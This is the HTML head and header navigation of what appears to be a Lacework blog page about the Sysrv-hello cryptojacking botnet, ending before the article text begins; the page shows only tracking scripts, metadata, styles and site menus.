
<!doctype html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta http-equiv="cleartype" content="on">

  <link rel="shortcut icon" href="/images/favicon.png">

    <script type="text/javascript" id="">
    (function(){function b(){!1===c&&(c=!0,Munchkin.init("016-ATL-295"))}var c=!1,a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="//munchkin.marketo.net/munchkin.js";a.onreadystatechange=function(){"complete"!=this.readyState&&"loaded"!=this.readyState||b()};a.onload=b;document.getElementsByTagName("head")[0].appendChild(a)})();
  </script>
<!-- OneTrust Cookies Consent Notice start for lacework.com -->

<script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js"  type="text/javascript" charset="UTF-8" data-domain-script="d217321a-c0ea-478d-8181-c42fa6610ce1" ></script>
<script type="text/javascript">
function OptanonWrapper() { }
</script>
<!-- OneTrust Cookies Consent Notice end for lacework.com -->

  <!-- Mutiny Script -->
<script>
(function(){var a=window.mutiny=window.mutiny||{};if(!window.mutiny.client){a.client={_queue:{}};var b=["identify","trackConversion"];var c=[].concat(b,["defaultOptOut","optOut","optIn"]);var d=function factory(c){return function(){for(var d=arguments.length,e=new Array(d),f=0;f<d;f++){e[f]=arguments[f]}a.client._queue[c]=a.client._queue[c]||[];if(b.includes(c)){return new Promise(function(b,d){a.client._queue[c].push({args:e,resolve:b,reject:d});setTimeout(d,500)})}else{a.client._queue[c].push({args:e})}}};c.forEach(function(b){a.client[b]=d(b)})}})();
</script>
<script data-cfasync="false" src="https://client-registry.mutinycdn.com/personalize/client/3c830faebddb032b.js"></script>
  <!-- End Mutiny Script -->

  <!-- Google Tag Manager -->
  <script>
    (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NF4XC5W');
  </script>
  <!-- End Google Tag Manager -->

  <!-- Google Site Verification -->
  <meta name="google-site-verification" content="m9wG6J5qjquZ5AoJ93Y-g7oZRKlUfiAtVY9bg33p0Kg" />
  <!-- End Google Site Verification-->



  <!-- LinkedIn Tracking Pixel -->
  <script type="text/javascript">
    _linkedin_partner_id = "446812";window._linkedin_data_partner_ids = window._linkedin_data_partner_ids || [];window._linkedin_data_partner_ids.push(_linkedin_partner_id);
  </script>
  <script type="text/javascript">
    (function(){var s = document.getElementsByTagName("script")[0];var b = document.createElement("script");b.type = "text/javascript";b.async = true;b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js";s.parentNode.insertBefore(b, s);})();
  </script>
  <noscript>
    <img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=446812&fmt=gif" />
  </noscript> 
  <!-- End LinkedIn Tracking Pixel -->

  <!--Tech Target Script -->
  <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script> 
  <!-- End Tech Target Script -->
  
  <meta name="facebook-domain-verification" content="ufigd9mj5tkgdxqst2w7kf0rd2j1ag" />
  
 <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO Premium plugin v18.3 (Yoast SEO v19.6) - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Sysrv-Hello Expands Infrastructure</title>
	<meta name="description" content="Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads." />
	<link rel="canonical" href="https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Sysrv-Hello Expands Infrastructure" />
	<meta property="og:description" content="Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads." />
	<meta property="og:url" content="https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/" />
	<meta property="og:site_name" content="Lacework" />
	<meta property="article:published_time" content="2021-04-22T15:00:51+00:00" />
	<meta property="article:modified_time" content="2022-01-31T16:37:02+00:00" />
	<meta property="og:image" content="https://www.lacework.com/wp-content/uploads/2021/04/sys1.png?_t=1668640371" />
	<meta property="og:image:width" content="776" />
	<meta property="og:image:height" content="547" />
	<meta property="og:image:type" content="image/png" />
	<meta name="author" content="Lacework Labs" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@Lacework" />
	<meta name="twitter:site" content="@Lacework" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Lacework Labs" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="11 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#article","isPartOf":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"},"author":{"name":"Lacework Labs","@id":"https://www.lacework.com/#/schema/person/33c7292fb1e2cf551532c61ac1c0e682"},"headline":"Sysrv-Hello Expands Infrastructure","datePublished":"2021-04-22T15:00:51+00:00","dateModified":"2022-01-31T16:37:02+00:00","mainEntityOfPage":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"},"wordCount":1932,"publisher":{"@id":"https://www.lacework.com/#organization"},"image":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"thumbnailUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","articleSection":["Blog","Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/","url":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/","name":"Sysrv-Hello Expands Infrastructure","isPartOf":{"@id":"https://www.lacework.com/#website"},"primaryImageOfPage":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"image":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"thumbnailUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","datePublished":"2021-04-22T15:00:51+00:00","dateModified":"2022-01-31T16:37:02+00:00","description":"Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads.","breadcrumb":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage","url":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","contentUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","width":776,"height":547},{"@type":"BreadcrumbList","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.lacework.com/"},{"@type":"ListItem","position":2,"name":"Sysrv-Hello Expands Infrastructure"}]},{"@type":"WebSite","@id":"https://www.lacework.com/#website","url":"https://www.lacework.com/","name":"Lacework","description":"","publisher":{"@id":"https://www.lacework.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.lacework.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.lacework.com/#organization","name":"Lacework","url":"https://www.lacework.com/","sameAs":["https://www.linkedin.com/company/lacework/","https://www.youtube.com/c/lacework","https://twitter.com/Lacework"],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/#/schema/logo/image/","url":"https://www.lacework.com/wp-content/uploads/2022/02/Lacework-Logo.png","contentUrl":"https://www.lacework.com/wp-content/uploads/2022/02/Lacework-Logo.png","width":1200,"height":627,"caption":"Lacework"},"image":{"@id":"https://www.lacework.com/#/schema/logo/image/"}},{"@type":"Person","@id":"https://www.lacework.com/#/schema/person/33c7292fb1e2cf551532c61ac1c0e682","name":"Lacework Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/a253ae7f57a9609ea5e66e4d50e67f57?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/a253ae7f57a9609ea5e66e4d50e67f57?s=96&d=mm&r=g","caption":"Lacework Labs"},"url":"https://www.lacework.com/author/lacework-labs/"}]}</script>
	<!-- / Yoast SEO Premium plugin. -->


<link rel='dns-prefetch' href='//www.lacework.com' />

<link rel="alternate" type="application/rss+xml" title="Lacework &raquo; Feed" href="https://www.lacework.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Lacework &raquo; Comments Feed" href="https://www.lacework.com/comments/feed/" />
<style>
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.lacework.com/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' media='all' />
<style id='global-styles-inline-css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
</style>
<link rel='stylesheet' id='lacework-style-css'  href='https://www.lacework.com/wp-content/themes/lacework/style.css?ver=1.0.0' media='all' />
<link rel="https://api.w.org/" href="https://www.lacework.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.lacework.com/wp-json/wp/v2/posts/6979" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.lacework.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.lacework.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.3" />
<link rel='shortlink' href='https://www.lacework.com/?p=6979' />
<link rel="alternate" type="application/json+oembed" href="https://www.lacework.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lacework.com%2Fblog%2Fsysrv-hello-expands-infrastructure%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.lacework.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lacework.com%2Fblog%2Fsysrv-hello-expands-infrastructure%2F&#038;format=xml" />

	<script type="text/javascript">
		var ajaxurl = 'https://www.lacework.com/wp-admin/admin-ajax.php'; //define Ajax url
	</script>

		<style id="wp-custom-css">
			.blogbold {
	
	font-weight: 800; 
	font-size: 1.125em;
	
}



#cookit #cookit-container p {
    font-family: nb-international, -apple-system, BlinkMacSystemFont, Segoe UI, Helvetica, Arial, sans-serif;
    font-size: 1.4rem;
	  line-height: 1.8rem;
    width: 62% !important;
    padding-top: 12px !important;
    padding-bottom:15px 	!important;
		padding-left:15px;
		
}



#cookit #cookit-container #cookit-button {
background-color: #1874ff;
margin-left: 10em;
text-align: center;
border-radius: 3px!important;
margin-top: 1em;	
margin-right: 1.25em;
}

#cookit-close {
width: 20px !important;
padding: 0 !important;
position: absolute;
right: 0;
top: 0;
}

.inlineCodeBlock {
	 color: #24292e;
    padding: .2em .4em;
    margin: 0;
    font-size: 1em;
    background-color: rgba(27,31,35,.05);
    border-radius: 6px;
	
}
   .syntaxhighlighter .line {
line-height: 1.6em !important;
    }		</style>
		  
 
</head>

  <body>
    <script>
      // If fonts are cached, skip FFO.
      if (sessionStorage.fontsLoaded === 'true') {
        document.documentElement.classList.add("fonts-loaded")
      }
      else {
        var script = document.createElement("script")
        script.src = "/wp-content/themes/lacework/build/scripts/fontloader.built.js"
        script.async = true
        document.head.appendChild(script)
      }
    </script>
    
    <link rel="stylesheet" href="/wp-content/themes/lacework/build/styles/app.bundle.css?ver=1.1.7">

    <header class="global-header" data-module="GlobalHeader">
  <div class="nav-wrapper">
    <div class="wrapper">
      <div class="global-header__utility">
  <div class="search-toggle icon-search utility-item">
    <form role="search" method="get" class="search-form" action="/">
      <label>
        <span class="screen-reader-text">Search for:</span>
        <input type="search" class="search-field" placeholder="Search" value="" name="s">
      </label>
      <div class="input-wrapper">
        <input type="submit" class="search-submit" value="Search">
        <span class="icon-chevron"></span>
      </div>
    </form>
    <span class="search-label">Search</span>
  </div>
  <!--<a href="https://login.lacework.net/ui/" class="icon-login utility-item">Login</a>-->
  <div class="utility-item">
    <div class="login-menu">
      <button class="login-toggle icon-login dropdown-btn login-selector">
        Login <i class="icon-chevron"></i>
      </button>
      <div class="login-list">
                <a href="https://login.lacework.net/ui/" target="_blank">US Data Center</a>
                <a href="https://login.fra.lacework.net/ui/" target="_blank">Frankfurt Data Center</a>
              </div>  
    </div>
  </div>
      <div class="global-header__language utility-item">
      <div class="language-menu">
        <button class="language-toggle icon-language dropdown-btn language-selector">
          English <i class="icon-chevron"></i>
        </button>
        <div class="language-list sl_opaque">
                    <a href="/">English</a>
                    <a href="/fr/">Français</a>
                    <a href="/de/">Deutsch</a>
                  </div>    
      </div>
    </div>
  </div>
      <div class="global-header__primary">
        <a class="global-header__logo" href="/">
          <svg id="Primary_Lockup_Light_Registered_" data-name="Primary Lockup (Light Registered)" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 1900 315.41"><defs><style>.cls-1{fill:url(#Lacework_Coral_Gradient_RGB);}.cls-2{fill:url(#Lacework_Blue_Gradient_RGB);}.cls-3{fill:url(#Lacework_Teal_Gradient_RGB);}.cls-4{fill:#fff;}</style><linearGradient id="Lacework_Coral_Gradient_RGB" x1="-37.72" y1="8.1" x2="33.69" y2="131.8" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#01023b"/><stop offset="1" stop-color="#ff646c"/></linearGradient><linearGradient id="Lacework_Blue_Gradient_RGB" x1="309.12" y1="36.3" x2="241.14" y2="154.05" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#01023b"/><stop offset="0.24" stop-color="#071573"/><stop offset="0.49" stop-color="#0d27aa"/><stop offset="0.72" stop-color="#1135d2"/><stop offset="0.89" stop-color="#143dea"/><stop offset="1" stop-color="#1540f3"/></linearGradient><linearGradient id="Lacework_Teal_Gradient_RGB" y1="27.57" x2="287.68" y2="27.57" gradientUnits="userSpaceOnUse"><stop offset="0.2" stop-color="#00f8f8"/><stop offset="0.3" stop-color="#00f4f8"/><stop offset="0.4" stop-color="#02e7f8"/><stop offset="0.51" stop-color="#04d3f7"/><stop offset="0.61" stop-color="#08b6f6"/><stop offset="0.72" stop-color="#0c90f5"/><stop offset="0.83" stop-color="#1163f4"/><stop offset="0.9" stop-color="#1540f3"/></linearGradient></defs><g id="Primary_Lockup_Light_Registered_2" data-name="Primary Lockup (Light Registered)"><g id="Shield"><path class="cls-1" d="M143.84,315.41S0,284.06,0,143.45V0L57.16,55.15v88.3c0,83.6,86.68,112,86.68,112Z"/><path class="cls-2" d="M143.84,315.41s143.84-31.35,143.84-172V0L230.53,55.15v88.3c0,83.6-86.69,112-86.69,112Z"/><polygon class="cls-3" points="230.53 55.15 57.16 55.15 0 0 287.68 0 230.53 55.15"/></g><g id="Wordmark"><g id="Wordmark-2" data-name="Wordmark"><path class="cls-4" d="M853.54,178.84l-.1.71c-4.55,32.29-26.12,50.08-60.75,50.08-41.86,0-68.9-29.57-68.9-75.34S750.83,79,792.69,79c33,0,54.24,16.83,58.4,46.16l.1.71H883l-.1-.92c-2.25-20.26-11.17-38.6-25.13-51.64-16.06-15-38.56-23-65.08-23-60.13,0-100.53,41.79-100.53,104s40.4,104,100.53,104c38.73,0,86.18-20.56,92.42-78.51l.1-.92Z"/><polygon class="cls-4" points="942.91 226.46 942.91 165.43 1030.72 165.43 1030.72 136.8 942.91 136.8 942.91 83.89 1040.18 83.89 1040.18 55.24 911.55 55.24 911.55 255.1 1041.53 255.1 1041.53 226.46 942.91 226.46"/><polygon class="cls-4" points="416.43 55.15 416.43 226.36 506.94 226.36 506.94 255 385.07 255 385.07 55.15 416.43 55.15"/><polygon class="cls-4" points="1270.53 55.24 1239.13 223.52 1207.45 55.24 1157.6 55.24 1125.92 223.52 1094.54 55.24 1063.9 55.24 1063.95 63.85 1100.59 255.1 1150.72 255.1 1182.47 85.78 1214.34 255.1 1264.47 255.1 1301.16 63.34 1301.16 55.24 1270.53 55.24"/><path class="cls-4" d="M1413.13,50.31c-61.74,0-103.22,41.79-103.22,104s41.48,104,103.22,104,103.22-41.79,103.22-104S1474.87,50.31,1413.13,50.31Zm71.59,104c0,45.22-28.77,75.61-71.59,75.61-44.15,0-71.59-29-71.59-75.61s27.44-75.61,71.59-75.61C1456,78.68,1484.72,109.07,1484.72,154.29Z"/><polygon class="cls-4" points="1857.25 75.83 1857.25 55.24 1833.35 55.24 1740 143.48 1740 55.24 1708.65 55.24 1708.65 255.1 1740 255.1 1740 184.84 1763.32 163.2 1835.67 255.1 1857.25 255.1 1857.25 233.9 1785.69 142.34 1857.25 75.83"/><path class="cls-4" d="M1640.2,171.9c27.73-6.62,43.65-27.3,43.75-56.89.11-37.21-24.07-59.49-64.68-59.62l-80-.24L1538.67,255l31.36.1.25-81,35.32.12L1658,255.1h25.63l.06-21.2S1640.13,171.92,1640.2,171.9Zm-69.65-88.72,45.93.14c24.7.08,36.17,9.89,36.11,30.89S1641,145,1616.3,144.88l-45.94-.14Z"/><path class="cls-4" d="M629.82,55.15H585.27L528.81,240.24V255h28.61l17.84-59.95h64.57L657.67,255h28.68V240.24Zm-46,110.48,23.56-79.88,23.78,79.88Z"/></g><g id="Registered"><path class="cls-4" d="M1889,255.1A11.08,11.08,0,1,1,1900,244,11.08,11.08,0,0,1,1889,255.1Zm0-21.21A10.12,10.12,0,1,0,1899.06,244,10.14,10.14,0,0,0,1889,233.89Zm-5,3.52h6.5a4,4,0,0,1,3.87,4,3.79,3.79,0,0,1-2.21,3.55c-.09,0-.09.16-.06.22l2.39,5.28a.12.12,0,0,1-.12.19h-1.48a.35.35,0,0,1-.32-.16l-2.17-5a.21.21,0,0,0-.22-.12h-4.46a.08.08,0,0,0-.09.09v5a.15.15,0,0,1-.16.16H1884a.15.15,0,0,1-.16-.16V237.56A.14.14,0,0,1,1884,237.41Zm1.79,1.6a.15.15,0,0,0-.16.16v4.46a.15.15,0,0,0,.16.16h4.55a2.38,2.38,0,0,0,2.23-2.36,2.44,2.44,0,0,0-2.29-2.42Z"/></g></g></g></svg>
        </a>
        <nav class="global-header__nav">
          <ul>
                                                                      <li class="nav-item-primary"><a href="/platform" data-flyout-trigger="flyout-1">Platform</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/platform">Platform</a><span class="icon-chevron" data-flyout-trigger="flyout-1"></span></li>
                                                                      <li class="nav-item-primary"><a href="/solutions" data-flyout-trigger="flyout-2">Solutions</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/solutions">Solutions</a><span class="icon-chevron" data-flyout-trigger="flyout-2"></span></li>
                                                                      <li class="nav-item-primary"><a href="/customers" data-flyout-trigger="flyout-3">Customers</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/customers">Customers</a><span class="icon-chevron" data-flyout-trigger="flyout-3"></span></li>
                                                                      <li class="nav-item-primary"><a href="/partners" data-flyout-trigger="flyout-4">Partners</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/partners">Partners</a><span class="icon-chevron" data-flyout-trigger="flyout-4"></span></li>
                                                                      <li class="nav-item-primary"><a href="/resources" data-flyout-trigger="flyout-5">Resources</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/resources">Resources</a><span class="icon-chevron" data-flyout-trigger="flyout-5"></span></li>
                                                                      <li class="nav-item-primary"><a href="/about-us/" data-flyout-trigger="flyout-6">Company</a></li>
              <li class="nav-item-primary nav-item-primary--mobile"><a href="/about-us/">Company</a><span class="icon-chevron" data-flyout-trigger="flyout-6"></span></li>
                      </ul>
          <a href="/get-started/" class="button button--pill button--pill--solid--coral" id="nav-cta">Get started</a>
          <div class="global-header__utility global-header__utility--mobile">
  <div class="search-toggle icon-search utility-item">
    <form role="search" method="get" class="search-form" action="/">
      <label>
        <span class="screen-reader-text">Search for:</span>
        <input type="search" class="search-field" placeholder="Search" value="" name="s">
      </label>
      <div class="input-wrapper">
        <input type="submit" class="search-submit" value="Search">
        <span class="icon-chevron"></span>
      </div>
    </form>
    <span class="search-label">Search</span>
  </div>
  <!--<a href="https://login.lacework.net/ui/" class="icon-login utility-item">Login</a>-->
  <div class="utility-item">
    <div class="login-menu">
      <button class="login-toggle icon-login dropdown-btn login-selector">
        Login <i class="icon-chevron"></i>
      </button>
      <div class="login-list">
                <a href="https://login.lacework.net/ui/" target="_blank">US Data Center</a>
                <a href="https://login.fra.lacework.net/ui/" target="_blank">Frankfurt Data Center</a>
              </div>  
    </div>
  </div>
      <div class="global-header__language utility-item">
      <div class="language-menu">
        <button class="language-toggle icon-language dropdown-btn language-selector">
          English <i class="icon-chevron"></i>
        </button>
        <div class="language-list sl_opaque">
                    <a href="/">English</a>
                    <a href="/fr/">Français</a>
                    <a href="/de/">Deutsch</a>
                  </div>    
      </div>
    </div>
  </div>
        </nav>
      </div>
      <div class="global-header__burger hamburger hamburger--spin">
        <div class="hamburger-box">
          <div class="hamburger-inner"></div>
        </div>
      </div>
    </div>
  </div>
              <div class="flyout" data-flyout="flyout-1">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/platform">Platform</a><span class="icon-chevron" data-flyout-trigger="flyout-1"></span></div>
      
                      <div class="tabs">
                              <div class="nav-item-primary-dropdown-tab active-tab" id="pni1-tab1"><i class="fa-duotone fa-layer-group" style="margin-right: 8px;"></i> Capabilities</div>
                              <div class="nav-item-primary-dropdown-tab " id="pni1-tab2"><i class="fa-solid fa-cloud" style="margin-right: 8px;"></i> Environments </div>
